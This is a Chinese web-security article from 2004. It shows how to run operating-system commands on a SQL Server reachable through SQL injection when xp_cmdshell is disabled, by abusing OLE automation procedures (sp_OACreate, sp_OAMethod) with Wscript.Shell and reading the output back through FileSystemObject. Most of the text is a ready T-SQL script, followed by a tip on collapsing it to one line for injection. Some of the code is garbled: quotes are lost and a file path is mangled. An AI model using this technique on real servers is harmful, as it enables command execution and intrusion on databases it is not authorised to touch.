首页 > 安全 > 网站安全 >

不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令

2004-11-17

我发现即使xp_cmdshell不可用了,还是有可能在服务器上运行CMD并得到回显结果的,这里要用到SQL服务器另外的几个系统存储过程:sp_OACreate,sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject

我发现即使xp_cmdshell不可用了,还是有可能在服务器上运行CMD并得到回显结果的,这里要用到SQL服务器另外的几个系统存储过程:sp_OACreate,sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。
sp_OACreate
在 Microsoft® SQL Server™ 实例上创建 OLE 对象实例。
语法
sp_OACreate progid, | clsid,
objecttoken OUTPUT
[ , context ]
sp_OAGetProperty
获取 OLE 对象的属性值。
语法
sp_OAGetProperty objecttoken,
propertyname
[, propertyvalue OUTPUT]
[, index...]
sp_OAMethod
调用 OLE 对象的方法。
语法
sp_OAMethod objecttoken,
methodname
[, returnvalue OUTPUT]
[ , [ @parametername = ] parameter [ OUTPUT ]
[...n]]

思路:
先在SQL Server 上建立一个Wscript.Shell,调用其run Method,将cmd.exe执行的结果输出到一个文件中,然后再建立一个Scripting.FileSystemObject,通过它建立一个TextStream对象,读出临时文件中的字符,一行一行的添加到一个临时表中。

以下是相应的SQL语句


CREATE TABLE mytmp(info VARCHAR(400),ID INT IDENTITY (1, 1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate wscript.shell,@shell output
EXEC sp_oamethod @shell,run,null,cmd.exe /c dir c:>c: emp.txt,0,true
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。

EXEC sp_oacreate scripting.filesystemobject,@fso output
EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌

WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,Readline,@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

注意:
如果你在进行注入测试时使用这种方法就不能有这样多的换行,必须把它们合为一行,每个语句中间用空格符隔开。

相关文章
最新文章
热点推荐